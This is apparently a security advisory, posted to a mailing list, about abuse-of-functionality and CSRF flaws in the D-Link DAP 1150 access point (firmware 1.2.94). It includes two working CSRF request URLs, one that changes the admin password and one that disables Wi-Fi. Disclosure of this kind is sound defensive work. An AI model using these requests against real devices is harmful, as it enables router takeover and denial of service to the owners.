AoF and CSRF vulnerabilities in D-Link DAP 1150

Hello 3APA3A!

I want to warn you about new security vulnerabilities in D-Link DAP 1150 (Wi-Fi Access Point and Router).

These are Abuse of Functionality and Cross-Site Request Forgery vulnerabilities. This is my third advisory from series of advisories about vulnerabilities in D-Link products.

Abuse of Functionality (WASC-42):

The login of administrator is fixed (it's login "admin"), which can't be change, only password. Which makes Brute Force attacks easier.

CSRF (WASC-09):

All functionality in admin panel is vulnerable to CSRF. Here are two examples.

Changing of admin's password:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password|

In section Wi-Fi / Common settings via CSRF it's possible to turn on/off Wi-Fi, and also to change MBSSID and BSSID.

The next request will turn off Wi-Fi:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%20%22mbssidNum%22:1,%20%22mbssidCur%22:1}

Vulnerable is the next model: D-Link DAP 1150, Firmware version 1.2.94. This model with other firmware versions also must be vulnerable.

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/5561/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua